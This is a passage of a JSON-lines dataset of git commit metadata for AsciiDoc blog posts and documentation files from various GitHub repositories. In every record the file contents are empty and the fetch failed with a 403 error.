{"commit":"31837daf26468060878c20ac7eb600883f59d09e","subject":"y2b create post Gadget Graveyard (Update!)","message":"y2b create post Gadget Graveyard (Update!)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-05-14-Gadget-Graveyard-Update.adoc","new_file":"_posts\/2011-05-14-Gadget-Graveyard-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5881f9a947510fc003400a90eb69976e53b76f7","subject":"Update 2016-10-18-Vertx-and-Blocking-Code.adoc","message":"Update 2016-10-18-Vertx-and-Blocking-Code.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2016-10-18-Vertx-and-Blocking-Code.adoc","new_file":"_posts\/2016-10-18-Vertx-and-Blocking-Code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd293561712ce9b8474e432dd32ed102f1fc0fe7","subject":"Update 2019-06-31-Kafka-integration-tests.adoc","message":"Update 2019-06-31-Kafka-integration-tests.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2019-06-31-Kafka-integration-tests.adoc","new_file":"_posts\/2019-06-31-Kafka-integration-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef6d06fcb548eca1cfcc85d8fffb8a598696d9c8","subject":"- user documentation","message":"- user documentation\n","repos":"buschmais\/extended-objects,SMB-TEC\/extended-objects","old_file":"doc\/src\/main\/asciidoc\/index.asciidoc","new_file":"doc\/src\/main\/asciidoc\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SMB-TEC\/extended-objects.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1db2da1e3cde3b2afe92c40dbadf1c9939e47f1d","subject":"Clarify combined functor's type","message":"Clarify combined functor's type\n","repos":"OlegTheCat\/cats,mccraigmccraig\/cats,yurrriq\/cats,funcool\/cats,alesguzik\/cats,tcsavage\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0a26b064eac25a4126d73648751aeb3c272a0f77","subject":"update","message":"update\n","repos":"tomoya92\/tomoya92.github.io,tomoya92\/tomoya92.github.io,tomoya92\/tomoya92.github.io","old_file":"_posts\/2017-04-25-demo.adoc","new_file":"_posts\/2017-04-25-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tomoya92\/tomoya92.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"4c877a67a278f52e23492b01b90939f180158c1e","subject":"Fix cache sample README","message":"Fix cache sample README\n\nCloses gh-5807\n","repos":"shakuzen\/spring-boot,philwebb\/spring-boot-concourse,eddumelendez\/spring-boot,kamilszymanski\/spring-boot,Nowheresly\/spring-boot,mbogoevici\/spring-boot,mbenson\/spring-boot,RichardCSantana\/spring-boot,bbrouwer\/spring-boot,ihoneymon\/spring-boot,philwebb\/spring-boot-concourse,nebhale\/spring-boot,shakuzen\/spring-boot,jvz\/spring-boot,jvz\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,RichardCSantana\/spring-boot,Nowheresly\/spring-boot,jvz\/spring-boot,akmaharshi\/jenkins,Buzzardo\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,ihoneymon\/spring-boot,mosoft521\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,linead\/spring-boot,wilkinsona\/spring-boot,jxblum\/spring-boot,ilayaperumalg\/spring-boot,javyzheng\/spring-boot,sebastiankirsch\/spring-boot,jayarampradhan\/spring-boot,vpavic\/spring-boot,kdvolder\/spring-boot,DeezCashews\/spring-boot,tiarebalbi\/spring-boot,nebhale\/spring-boot,NetoDevel\/spring-boot,mdeinum\/spring-boot,javyzheng\/spring-boot,philwebb\/spring-boot-concourse,jbovet\/spring-boot,eddumelendez\/spring-boot,felipeg48\/spring-boot,mosoft521\/spring-boot,vpavic\/spring-boot,joshthornhill\/spring-boot,bclozel\/spring-boot,royclarkson\/spring-boot,akmaharshi\/jenkins,wilkinsona\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,ollie314\/spring-boot,bbrouwer\/spring-boot,afroje-reshma\/spring-boot-sample,philwebb\/spring-boot-concourse,royclarkson\/spring-boot,bbrouwer\/spring-boot,candrews\/spring-boot,isopov\/spring-boot,joshiste\/spring-boot,bbrouwer\/spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,lexandro\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jxblum\/spring-boot,rweisleder\/spring-boot,i007422\/jenkins2-course-spring-boot,joshiste\/spring-boot,shangyi0102\/spring-boot,yhj630520\/spring-boot,tsachev\/spring-boot,sbcoba\/spring-boot,shakuzen\/spring-boot,RichardCSantana\/spring-boot,SaravananParthasarathy\/SPSDemo,lexandro\/spring-boot,rweisleder\/spring-boot,mbenson\/spring-boot,qerub\/spring-boot,afroje-reshma\/spring-boot-sample,lucassaldanha\/spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,aahlenst\/spring-boot,candrews\/spring-boot,vakninr\/spring-boot,jayarampradhan\/spring-boot,minmay\/spring-boot,shangyi0102\/spring-boot,hqrt\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,thomasdarimont\/spring-boot,xiaoleiPENG\/my-project,vakninr\/spring-boot,ollie314\/spring-boot,royclarkson\/spring-boot,ollie314\/spring-boot,joshiste\/spring-boot,brettwooldridge\/spring-boot,yangdd1205\/spring-boot,vakninr\/spring-boot,kamilszymanski\/spring-boot,mosoft521\/spring-boot,chrylis\/spring-boot,cleverjava\/jenkins2-course-spring-boot,yangdd1205\/spring-boot,ptahchiev\/spring-boot,yangdd1205\/spring-boot,michael-simons\/spring-boot,qerub\/spring-boot,philwebb\/spring-boot,kamilszymanski\/spring-boot,hello2009chen\/spring-boot,zhanhb\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,Buzzardo\/spring-boot,aahlenst\/spring-boot,mosoft521\/spring-boot,thomasdarimont\/spring-boot,nebhale\/spring-boot,vakninr\/spring-boot,sebastiankirsch\/spring-boot,mosoft521\/spring-boot,mbenson\/spring-boot,htynkn\/spring-boot,dreis2211\/spring-boot,isopov\/spring-boot,tsachev\/spring-boot,mbogoevici\/spring-boot,spring-projects\/spring-boot,mdeinum\/spring-boot,vpavic\/spring-boot,cleverjava\/jenkins2-course-spr
ing-boot,sbcoba\/spring-boot,aahlenst\/spring-boot,scottfrederick\/spring-boot,jbovet\/spring-boot,joshthornhill\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,michael-simons\/spring-boot,yhj630520\/spring-boot,xiaoleiPENG\/my-project,shangyi0102\/spring-boot,pvorb\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mdeinum\/spring-boot,candrews\/spring-boot,isopov\/spring-boot,hello2009chen\/spring-boot,bijukunjummen\/spring-boot,sebastiankirsch\/spring-boot,donhuvy\/spring-boot,mbogoevici\/spring-boot,lburgazzoli\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,sebastiankirsch\/spring-boot,ihoneymon\/spring-boot,lucassaldanha\/spring-boot,jayarampradhan\/spring-boot,wilkinsona\/spring-boot,ihoneymon\/spring-boot,Nowheresly\/spring-boot,akmaharshi\/jenkins,yhj630520\/spring-boot,nebhale\/spring-boot,chrylis\/spring-boot,pvorb\/spring-boot,chrylis\/spring-boot,bclozel\/spring-boot,jbovet\/spring-boot,isopov\/spring-boot,DeezCashews\/spring-boot,yhj630520\/spring-boot,candrews\/spring-boot,ilayaperumalg\/spring-boot,minmay\/spring-boot,minmay\/spring-boot,olivergierke\/spring-boot,dreis2211\/spring-boot,Nowheresly\/spring-boot,javyzheng\/spring-boot,ihoneymon\/spring-boot,jxblum\/spring-boot,jxblum\/spring-boot,SaravananParthasarathy\/SPSDemo,ihoneymon\/spring-boot,olivergierke\/spring-boot,tsachev\/spring-boot,joshthornhill\/spring-boot,pvorb\/spring-boot,hqrt\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,linead\/spring-boot,bclozel\/spring-boot,brettwooldridge\/spring-boot,brettwooldridge\/spring-boot,lburgazzoli\/spring-boot,ilayaperumalg\/spring-boot,scottfrederick\/spring-boot,ilayaperumalg\/spring-boot,tiarebalbi\/spring-boot,isopov\/spring-boot,kdvolder\/spring-boot,aahlenst\/spring-boot,ollie314\/spring-boot,javyzheng\/spring-boot,RichardCSantana\/spring-boot,philwebb\/spring-boot,mbogoevici\/spring-boot,i007422\/jenkins2-course-spring-boot,donhuvy\/spring-boot,habuma\/spring-boot,bjornlindstrom\/spring-boot,donhuvy\/spring-boot,zhanhb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,rweisleder\/spring-boot,philwebb\/spring-boot,eddumelendez\/spring-boot,mdeinum\/spring-boot,scottfrederick\/spring-boot,jayarampradhan\/spring-boot,michael-simons\/spring-boot,lburgazzoli\/spring-boot,mbenson\/spring-boot,felipeg48\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,NetoDevel\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,linead\/spring-boot,wilkinsona\/spring-boot,linead\/spring-boot,olivergierke\/spring-boot,tsachev\/spring-boot,wilkinsona\/spring-boot,candrews\/spring-boot,mbogoevici\/spring-boot,qerub\/spring-boot,shakuzen\/spring-boot,ptahchiev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,akmaharshi\/jenkins,sbcoba\/spring-boot,joshiste\/spring-boot,ptahchiev\/spring-boot,bbrouwer\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,drumonii\/spring-boot,bijukunjummen\/spring-boot,deki\/spring-boot,scottfrederick\/spring-boot,zhanhb\/spring-boot,shangyi0102\/spring-boot,felipeg48\/spring-boot,habuma\/spring-boot,lexandro\/spring-boot,i007422\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,rweisleder\/spring-boot,jvz\/spring-boot,zhanhb\/spring-boot,htynkn\/spring-boot,lucassaldanha\/spring-boot,bijukunjummen\/spring-boot,bijukunjummen\/spring-boot,kdvolder\/spring-boot,ptahchiev\/spring-boot,pvorb\/spring-boot,jxblum\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,kdvolder\/spring-boot,bclozel\/spring-boot,tsachev\/spring-boot,cleverjava\/
jenkins2-course-spring-boot,dreis2211\/spring-boot,habuma\/spring-boot,minmay\/spring-boot,herau\/spring-boot,SaravananParthasarathy\/SPSDemo,bijukunjummen\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,habuma\/spring-boot,sbcoba\/spring-boot,htynkn\/spring-boot,donhuvy\/spring-boot,herau\/spring-boot,deki\/spring-boot,donhuvy\/spring-boot,deki\/spring-boot,pvorb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,nebhale\/spring-boot,lucassaldanha\/spring-boot,drumonii\/spring-boot,zhanhb\/spring-boot,hello2009chen\/spring-boot,hqrt\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,joshthornhill\/spring-boot,spring-projects\/spring-boot,ollie314\/spring-boot,spring-projects\/spring-boot,joshiste\/spring-boot,Nowheresly\/spring-boot,drumonii\/spring-boot,sbcoba\/spring-boot,ilayaperumalg\/spring-boot,Buzzardo\/spring-boot,deki\/spring-boot,lburgazzoli\/spring-boot,isopov\/spring-boot,philwebb\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ilayaperumalg\/spring-boot,herau\/spring-boot,bjornlindstrom\/spring-boot,minmay\/spring-boot,herau\/spring-boot,eddumelendez\/spring-boot,bjornlindstrom\/spring-boot,philwebb\/spring-boot-concourse,kamilszymanski\/spring-boot,javyzheng\/spring-boot,yhj630520\/spring-boot,habuma\/spring-boot,aahlenst\/spring-boot,drumonii\/spring-boot,habuma\/spring-boot,royclarkson\/spring-boot,rweisleder\/spring-boot,SaravananParthasarathy\/SPSDemo,kamilszymanski\/spring-boot,hello2009chen\/spring-boot,lexandro\/spring-boot,tiarebalbi\/spring-boot,deki\/spring-boot,xiaoleiPENG\/my-project,i007422\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,scottfrederick\/spring-boot,jbovet\/spring-boot,afroje-reshma\/spring-boot-sample,michael-simons\/spring-boot,qerub\/spring-boot,bclozel\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,lburgazzoli\/spring-boot,philwebb\/spring-boot,sebastiankirsch\/spring-boot,shakuzen\/spring-boot,qerub\/spring-boot,spring-projects\/spring-boot,thomasdarimont\/spring-boot,joshthornhill\/spring-boot,DeezCashews\/spring-boot,vpavic\/spring-boot,i007422\/jenkins2-course-spring-boot,vpavic\/spring-boot,mdeinum\/spring-boot,thomasdarimont\/spring-boot,hqrt\/jenkins2-course-spring-boot,jbovet\/spring-boot,jxblum\/spring-boot,joshiste\/spring-boot,shangyi0102\/spring-boot,zhanhb\/spring-boot,drumonii\/spring-boot,DeezCashews\/spring-boot,linead\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,SaravananParthasarathy\/SPSDemo,herau\/spring-boot,brettwooldridge\/spring-boot,dreis2211\/spring-boot,mdeinum\/spring-boot,NetoDevel\/spring-boot,bjornlindstrom\/spring-boot,bjornlindstrom\/spring-boot,NetoDevel\/spring-boot,jvz\/spring-boot,afroje-reshma\/spring-boot-sample,bclozel\/spring-boot,xiaoleiPENG\/my-project,michael-simons\/spring-boot,NetoDevel\/spring-boot,vakninr\/spring-boot,chrylis\/spring-boot,eddumelendez\/spring-boot,dreis2211\/spring-boot,lucassaldanha\/spring-boot,ptahchiev\/spring-boot,akmaharshi\/jenkins,olivergierke\/spring-boot,olivergierke\/spring-boot,RichardCSantana\/spring-boot,donhuvy\/spring-boot,mbenson\/spring-boot,xiaoleiPENG\/my-project,mbenson\/spring-boot,spring-projects\/spring-boot,htynkn\/spring-boot,rweisleder\/spring-boot,felipeg48\/spring-boot,afroje-reshma\/spring-boot-sample,lexandro\/spring-boot,kdvolder\/spring-boot,eddumelendez\/spring-boot,brettwooldridge\/spring-boot","old_file":"spring-boot-samples\/spring-boot-sample-cache\/README.adoc","new_file":"spring-boot-samples\/spring-boot-sample-cache\/README.adoc","new_contents":"","old_cont
ents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6fd5c2a80bda76b2fb699909afade6982191dd17","subject":"docs: Explain transaction content","message":"docs: Explain transaction content\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/journal.adoc","new_file":"docs\/journal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"835f0994e73a107c2f41639b8bd3e148798388e3","subject":"Update 2016-02-15-Test.adoc","message":"Update 2016-02-15-Test.adoc","repos":"hitamutable\/hitamutable.github.io,hitamutable\/hitamutable.github.io,hitamutable\/hitamutable.github.io,hitamutable\/hitamutable.github.io","old_file":"_posts\/2016-02-15-Test.adoc","new_file":"_posts\/2016-02-15-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hitamutable\/hitamutable.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14e4e10cf30360ad8ef28a52d9793feb859d156a","subject":"Update 2015-01-31-Blog-Title.adoc","message":"Update 2015-01-31-Blog-Title.adoc","repos":"rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io","old_file":"_posts\/2015-01-31-Blog-Title.adoc","new_file":"_posts\/2015-01-31-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rohithkrajan\/rohithkrajan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c158050a889c980b15520c166e0cfac89f72c99","subject":"Update 2016-06-28-First-post.adoc","message":"Update 2016-06-28-First-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-28-First-post.adoc","new_file":"_posts\/2016-06-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5079472e861b9a0fb1ba1f364c5e3090b168272","subject":"Update 2017-03-22-more-bread.adoc","message":"Update 2017-03-22-more-bread.adoc","repos":"thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io","old_file":"_posts\/2017-03-22-more-bread.adoc","new_file":"_posts\/2017-03-22-more-bread.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomaszahr\/thomaszahr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2af5285db589e959d1bbe0e13196943f52440d0d","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 
2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"132dec3149dec5fce99e9cd3084a285220f6ddce","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed813455017674515f61b4aae6d72112e83d734a","subject":"ASCIIDoc formatted the protocol notes for the 790IT Blood Pressure Monitor","message":"ASCIIDoc formatted the protocol notes for the 790IT Blood Pressure Monitor\n","repos":"openyou\/libomron,openyou\/libomron,openyou\/libomron","old_file":"doc\/omron_protocol_notes.asciidoc","new_file":"doc\/omron_protocol_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openyou\/libomron.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"ed067a82fe5f183d5aebc06974494de54eab210b","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-aws","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-aws.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3be98fb6fb8959d4ec65127253f0997512e3e46c","subject":"doc: implementers-guide: convert to ODP standard layout","message":"doc: implementers-guide: convert to ODP standard layout\n\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov 
<db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"mike-holmes-linaro\/odp,erachmi\/odp,rsalveti\/odp,rsalveti\/odp,kalray\/odp-mppa,kalray\/odp-mppa,rsalveti\/odp,nmorey\/odp,erachmi\/odp,rsalveti\/odp,kalray\/odp-mppa,ravineet-singh\/odp,erachmi\/odp,ravineet-singh\/odp,kalray\/odp-mppa,kalray\/odp-mppa,ravineet-singh\/odp,dkrot\/odp,mike-holmes-linaro\/odp,rsalveti\/odp,kalray\/odp-mppa,erachmi\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,kalray\/odp-mppa,dkrot\/odp,nmorey\/odp,dkrot\/odp,nmorey\/odp,dkrot\/odp","old_file":"doc\/implementers-guide\/implementers-guide.adoc","new_file":"doc\/implementers-guide\/implementers-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"2b023ee40d0403fd13145b0cf3d1bebe343a102e","subject":"y2b create post This New Smartphone Might Surprise You...","message":"y2b create post This New Smartphone Might Surprise You...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-03-This-New-Smartphone-Might-Surprise-You.adoc","new_file":"_posts\/2017-01-03-This-New-Smartphone-Might-Surprise-You.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"356cc0b2a95769eb0a4d5b0ff17b6e0cf870d10d","subject":"Added a CONTRIBUTING notice","message":"Added a CONTRIBUTING notice\n","repos":"jeteve\/elasticsearch-perl,adjust\/elasticsearch-perl,elastic\/elasticsearch-perl,jeteve\/elasticsearch-perl,adjust\/elasticsearch-perl,elastic\/elasticsearch-perl,jeteve\/elasticsearch-perl,adjust\/elasticsearch-perl","old_file":"CONTRIBUTING.asciidoc","new_file":"CONTRIBUTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adjust\/elasticsearch-perl.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a65bbcc8e939ae48e5f8b3aa7bde9a46169a874c","subject":"Add from-source installation instructions for SLES 12","message":"Add from-source installation instructions for SLES 12\n\nChange-Id: I664fd72f0dfdc6801012ee0d9f972cc05679cbd5\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1863\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Internal 
Jenkins\n","repos":"EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"612fa1ed97b55950a8bc229f27301f3151fd2cf7","subject":"Create Deeper\/testchapter.adoc","message":"Create Deeper\/testchapter.adoc","repos":"JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook","old_file":"Deeper\/testchapter.adoc","new_file":"Deeper\/testchapter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JClingo\/gitbook.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"a883a792e332d658ea65ed8e6f2c9d5843fac970","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5efa26539711e59e871ed29a81a1ccbcae71787f","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd28aaf7279480592f149d6e2da0e9f09454d6ac","subject":"create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","message":"create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-OnePlus-5T-Lava-Red-Unboxing---500-Cant-Go-Further.adoc","new_file":"_posts\/2018-02-26-OnePlus-5T-Lava-Red-Unboxing---500-Cant-Go-Further.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"f93ee5716e13c4aa4c8e27e81df1bb83c4173e1d","subject":"Update 2015-11-23-Sispmctl.adoc","message":"Update 2015-11-23-Sispmctl.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2015-11-23-Sispmctl.adoc","new_file":"_posts\/2015-11-23-Sispmctl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cb32d773a6ed8d04465b70dc9852b7997306853","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36fabb15105540ef84171f1adb3cf8a031a7ced4","subject":"add news","message":"add 